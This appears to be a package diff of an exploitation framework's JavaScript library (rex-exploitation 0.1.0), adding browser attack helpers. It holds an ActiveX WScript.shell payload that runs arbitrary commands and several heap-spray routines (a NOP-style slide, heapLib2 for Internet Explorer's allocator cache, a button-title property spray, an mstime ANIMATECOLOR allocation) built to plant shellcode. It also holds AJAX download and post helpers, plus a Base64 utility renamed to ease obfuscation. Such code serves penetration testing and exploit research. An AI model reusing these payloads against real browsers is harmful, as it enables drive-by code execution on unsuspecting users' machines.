rex-exploitation 0.1.0

data/data/js/memory/explib2/payload/exec.js

@@ -0,0 +1,10 @@
+function payload_exec(cmd) {
+
+	this.execute = function(explib) {
+
+		var WshShell = new ActiveXObject("WScript.shell");
+		var oExec = WshShell.Exec(cmd);
+	}
+
+	return this;
+}

data/data/js/memory/heap_spray.js

@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+  var index;
+  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
+  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+  for (index = 0; index < heapBlockCnt; index++) {
+    memory[index] = retSlide + shellcode;
+  }
+}

data/data/js/memory/heaplib2.js

@@ -0,0 +1,192 @@
+//heapLib2 namespace
+function heapLib2() { } 
+
+//These are attributes that will not actually create a bstr 
+//and directly use the back-end allocator, completely bypassing the cache
+var global_attrs = ["title", "lang", "class"];
+
+heapLib2.ie = function(element, maxAlloc)
+{
+    //128mb
+    this.maxAlloc = 0x8000000;
+
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+
+    if(maxAlloc)
+        this.maxAlloc = maxAlloc; 
+
+    //empty the cache
+    this.Oleaut32EmptyCache();
+    this.Oleaut32FillCache();
+    this.Oleaut32EmptyCache();
+
+}
+
+heapLib2.ie.prototype.newelement = function(element)
+{
+    //make sure that an HTML DOM element is passed
+    if(!element.nodeType || element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    this.element = element; 
+}
+
+heapLib2.ie.prototype.alloc = function(attr_name, size, cache_ok) 
+{
+    if(typeof(cache_ok)==='undefined')
+        cache_ok = false;
+    else
+        cache_ok = true;
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof size != "number")
+        throw "alloc.argument: size is not a number: " + size; 
+
+    //make sure the size isn't one of the special values
+    if(!cache_ok && (size == 0x20 || size == 0x40 || size == 0x100 || size == 0x8000)) 
+        throw "alloc.argument: size cannot be flushed from cache: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    //the size must be at a 16-byte boundary this can be commented out but 
+    //the allocations will be rounded to the nearest 16-byte boundary 
+    if(size % 16 != 0)
+        throw "alloc.argument: size be a multiple of 16: " + size;
+
+    //20-bytes will be added to the size
+    //<4-byte size><data><2-byte null>
+    size = ((size / 2) - 6);
+
+    //May have to change this due to allocation side effects
+    var data = new Array(size).join(cache_ok ? "C" : "$"); 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, data);
+
+}
+
+//These items will allocate/free memory and should really 
+//only be used once per element. You can use a new element 
+//by calling the 'newelement' method above
+heapLib2.ie.prototype.alloc_nobstr = function(val)
+{
+    //make sure the aval is a string
+    if(typeof val != "string")
+        throw "alloc.argument: val is not a string"; 
+
+    var size = (val.length * 2) + 6; 
+
+    if(size > this.maxAlloc)
+        throw "alloc_nobstr.val: string length cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var i = 0;
+    var set_gattr = 0; 
+    for(i = 0; i < global_attrs.length; i++)
+    {
+        curr_gattr = global_attrs[i];
+        if(!this.element.getAttribute(curr_gattr))
+        {
+            this.element.setAttribute(curr_gattr, "");
+            this.element.setAttribute(curr_gattr, val);
+            set_gattr = 1;  
+            break; 
+        }
+    }
+
+    if(set_gattr == 0)
+        throw "alloc_nobstr: all global attributes are assigned, try a new element"; 
+}
+
+//completely bypass the cache, useful for heap spraying (see heapLib2_test.html)
+heapLib2.ie.prototype.sprayalloc = function(attr_name, str) 
+{
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(this.element.getAttribute(attr_name))
+        throw "alloc.argument: element already contains attr_name: " + attr_name;
+
+    //ensure the size is a number
+    if(typeof str != "string")
+        throw "alloc.argument: str is not a string: " + typeof str; 
+
+    var size = (str.length * 2) + 6; 
+
+    //make sure the size isn't one of the special values
+    if(size <= 0x8000) 
+        throw "alloc.argument: bigalloc must be greater than 0x8000: " + size; 
+
+    if(size > this.maxAlloc)
+        throw "alloc.argument: size cannot be greater than maxAlloc(" + this.maxAlloc + ") : " + size; 
+
+    var attr = document.createAttribute(attr_name);
+    this.element.setAttributeNode(attr);
+    this.element.setAttribute(attr_name, str);
+}
+
+heapLib2.ie.prototype.free = function(attr_name, skip_flush) 
+{
+    if(typeof(skip_flush)==='undefined')
+        skip_flush = false;
+    else
+        skip_flush = true;
+
+    //make sure that an HTML DOM element is passed
+    if(!this.element.nodeType || this.element.nodeType != 1)
+        throw "alloc.argument: element not valid"; 
+
+    //make sure the attribute name is a string
+    if(typeof attr_name != "string")
+        throw "alloc.argument: attr_name is not a string"; 
+
+    //make sure that the attribute name is not already present in the html element
+    if(!this.element.getAttribute(attr_name))
+        throw "alloc.argument: element does not contain attribute: " + attr_name;
+
+    //make sure the cache is full so the chunk returns the general purpose heap
+    if(!skip_flush)
+        this.Oleaut32FillCache(); 
+
+    this.element.setAttribute(attr_name, null);
+
+    if(!skip_flush)
+        this.Oleaut32EmptyCache()
+}
+
+heapLib2.ie.prototype.Oleaut32FillCache = function()
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.free("cache0x20"+i, true); 
+        this.free("cache0x40"+i, true);
+        this.free("cache0x100"+i, true);
+        this.free("cache0x8000"+i, true);
+    }
+}
+
+heapLib2.ie.prototype.Oleaut32EmptyCache = function() 
+{
+    for(var i = 0; i < 6; i++)
+    {
+        this.alloc("cache0x20"+i, 0x20, true); 
+        this.alloc("cache0x40"+i, 0x40, true);
+        this.alloc("cache0x100"+i, 0x100, true);
+        this.alloc("cache0x8000"+i, 0x8000, true);
+    }
+}

data/data/js/memory/mstime_malloc.js

@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+  if (offset        == undefined) { offset = 0; }
+  if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+  var buf = "";
+  for (var i=0; i < heapBlockSize/4; i++) {
+    if (i == offset) {
+      if (i == 0) { buf += shellcode;       }
+      else        { buf += ";" + shellcode; }
+    }
+    else {
+      buf += ";#W00TA";
+    }
+  }
+
+  var e = document.getElementById(objId);
+  if (e == null) {
+    var eleId = "W00TB"
+    var acTag = "<t:ANIMATECOLOR id='"+ eleId  + "'/>"
+    document.body.innerHTML = document.body.innerHTML + acTag;
+    e = document.getElementById(eleId);
+  }
+  try { e.values = buf; }
+  catch (e) {}
+}

data/data/js/memory/property_spray.js

@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var maxAllocs     = oArg.maxAllocs;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined)  { throw "Missing argument: shellcode"; }
+  if (offset        == undefined)  { offset        = 0x00; }
+  if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
+  if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
+
+  if (offset > 0x800) { throw "Bad alignment"; }
+
+  sym_div_container = document.getElementById(objId);
+
+  if (sym_div_container == null) {
+    sym_div_container = document.createElement("div");
+  }
+
+  sym_div_container.style.cssText = "display:none";
+  var data;
+  junk = unescape("%u2020%u2020");
+  while (junk.length < offset+0x1000) junk += junk;
+
+  data = junk.substring(0,offset) + shellcode;
+  data += junk.substring(0,0x800-offset-shellcode.length);
+
+  while (data.length < heapBlockSize) data += data;
+
+  for (var i = 0; i < maxAllocs; i++)
+  {
+    var obj = document.createElement("button");
+    obj.title = data.substring(0, (heapBlockSize-2)/2);
+    sym_div_container.appendChild(obj);
+  }
+}

data/data/js/network/ajax_download.js

@@ -0,0 +1,18 @@
+function ajax_download(oArg) {
+  if (!oArg.method) { oArg.method = "GET"; }
+  if (!oArg.path)   { throw "Missing parameter 'path'"; }
+  if (!oArg.data)   { oArg.data = null; }
+
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open(oArg.method, oArg.path, false);
+  xmlHttp.send(oArg.data);
+  if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+    return xmlHttp.responseText;
+  }
+  return null;
+}

data/data/js/network/ajax_post.js

@@ -0,0 +1,18 @@
+function postInfo(path, data, cb) {
+  var xmlHttp = new XMLHttpRequest();
+
+  if (xmlHttp.overrideMimeType) {
+    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+  }
+
+  xmlHttp.open('POST', path, !!cb);
+
+  if (cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { cb.apply(this, arguments); }
+    };
+  }
+
+  xmlHttp.send(data);
+  return xmlHttp;
+}

data/data/js/network/xhr_shim.js

@@ -0,0 +1,15 @@
+if (!window.XMLHTTPRequest) {
+  (function() {
+    var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
+    for (idx = 0; idx < activeObjs.length; idx++) {
+      try {
+        new ActiveXObject(activeObjs[idx]);
+        window.XMLHttpRequest = function() {
+          return new ActiveXObject(activeObjs[idx]);
+        };
+        break;
+      }
+      catch (e) {}
+    }
+  })();
+}

data/data/js/utils/base64.js

@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+  // private property
+  _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+  // private method
+  _utf8_encode : function ( input ){
+    input = input.replace(/\r\n/g,"\\n");
+    var utftext = "";
+    var input_idx;
+
+    for (input_idx = 0; input_idx < input.length; input_idx++) {
+      var chr = input.charCodeAt(input_idx);
+      if (chr < 128) {
+        utftext += String.fromCharCode(chr);
+      }
+      else if((chr > 127) && (chr < 2048)) {
+        utftext += String.fromCharCode((chr >> 6) | 192);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      } else {
+        utftext += String.fromCharCode((chr >> 12) | 224);
+        utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+        utftext += String.fromCharCode((chr & 63) | 128);
+      }
+    }
+
+    return utftext;
+  },
+
+  // public method for encoding
+  encode : function( input ) {
+    var output = "";
+    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+    var input_idx = 0;
+
+    input = Base64._utf8_encode(input);
+
+    while (input_idx < input.length) {
+      chr1 = input.charCodeAt( input_idx++ );
+      chr2 = input.charCodeAt( input_idx++ );
+      chr3 = input.charCodeAt( input_idx++ );
+
+      enc1 = chr1 >> 2;
+      enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+      enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+      enc4 = chr3 & 63;
+
+      if (isNaN(chr2)) {
+        enc3 = enc4 = 64;
+      } else if (isNaN(chr3)) {
+        enc4 = 64;
+      }
+      output = output +
+      this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+      this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+    }
+    return output;
+  },
+  // public method for decoding
+  decode : function (input) {
+    var output = "";
+    var chr1, chr2, chr3;
+    var enc1, enc2, enc3, enc4;
+    var i = 0;
+
+    input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+    while (i < input.length) {
+
+      enc1 = this._keyStr.indexOf(input.charAt(i++));
+      enc2 = this._keyStr.indexOf(input.charAt(i++));
+      enc3 = this._keyStr.indexOf(input.charAt(i++));
+      enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+      chr1 = (enc1 << 2) | (enc2 >> 4);
+      chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+      chr3 = ((enc3 & 3) << 6) | enc4;
+
+      output = output + String.fromCharCode(chr1);
+
+      if (enc3 != 64) {
+        output = output + String.fromCharCode(chr2);
+      }
+      if (enc4 != 64) {
+        output = output + String.fromCharCode(chr3);
+      }
+
+    }
+
+    output = Base64._utf8_decode(output);
+
+    return output;
+
+  },
+  _utf8_decode : function (utftext) {
+    var string = "";
+    var input_idx = 0;
+    var chr1 = 0;
+    var chr2 = 0;
+    var chr3 = 0;
+
+    while ( input_idx < utftext.length ) {
+
+      chr1 = utftext.charCodeAt(input_idx);
+
+      if (chr1 < 128) {
+        string += String.fromCharCode(chr1);
+        input_idx++;
+      }
+      else if((chr1 > 191) && (chr1 < 224)) {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
+        input_idx += 2;
+      } else {
+        chr2 = utftext.charCodeAt(input_idx+1);
+        chr3 = utftext.charCodeAt(input_idx+2);
+        string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+        input_idx += 3;
+      }
+    }
+
+    return string;
+  }
+
+};